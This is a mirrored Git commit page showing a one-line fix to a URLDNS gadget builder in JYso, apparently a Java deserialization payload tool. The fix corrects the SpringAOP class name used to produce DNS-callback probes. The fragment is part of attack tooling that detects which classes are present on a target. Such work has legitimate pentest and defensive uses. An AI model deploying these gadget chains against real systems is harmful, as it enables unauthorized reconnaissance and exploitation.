mirror of
https://github.com/qi4L/JYso.git
synced 2026-09-23 07:11:52 +08:00
fix: 修复URLDNS链SpringAOP类错误
This commit is contained in:
@@ -231,7 +231,7 @@ public class URLDNS implements ObjectPayload<Object> {
|
||||
break;
|
||||
case "SpringAOP":
|
||||
//fastjon/jackson两个链触发toString的变种,都需要springAOP
|
||||
Object springAOP = getURLDNSGadget("SpringAOP." + dnsLog, "org.springframework.aop.target.HotSwappableTargetSource.HotSwappableTargetSource");
|
||||
Object springAOP = getURLDNSGadget("SpringAOP." + dnsLog, "org.springframework.aop.target.HotSwappableTargetSource");
|
||||
list.add(springAOP);
|
||||
break;
|
||||
case "winlinux":
|
||||
|
||||
Reference in New Issue
Block a user